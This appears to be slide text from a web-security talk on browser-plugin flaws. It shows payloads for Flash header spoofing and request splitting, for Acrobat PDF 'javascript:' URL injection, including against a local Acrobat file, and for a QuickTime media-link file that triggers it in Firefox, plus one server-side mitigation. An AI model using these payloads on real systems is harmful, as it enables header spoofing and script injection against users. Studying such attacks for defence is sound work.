Exploring the Broken Web

Remote spoofing arbitrary request headers

Courtesy of IE and Flash

var req = new LoadVars();
req.addRequestHeader("Host:", "host.example.com");
req.send("http://host.foo.com/", "_blank");

A variation allows request splitting against servers with keep-alive enabled.

Macrodobe involved again

Acrobat

http://example.org/foo.pdf#bar=javascript:alert('XSS');

Don't serve PDFs

AddType application/octet-stream .pdf

Local too

file:///C:/Program%20Files/Adobe/Acrobat%207.0/Resource/ENUtxt.pdf#a=javascript:...

Embed it in a media file to trick Firefox

<?xml version="1.0">
<?quicktime type="application/x-quicktime-media-link"?>
<embed src="a.mp3" autoplay="true" 
 qtnext="file:///C:/Program%20Files/Adobe/Acrobat%207.0/Resource/ENUtxt.pdf#a=javascript:your_code_here"/>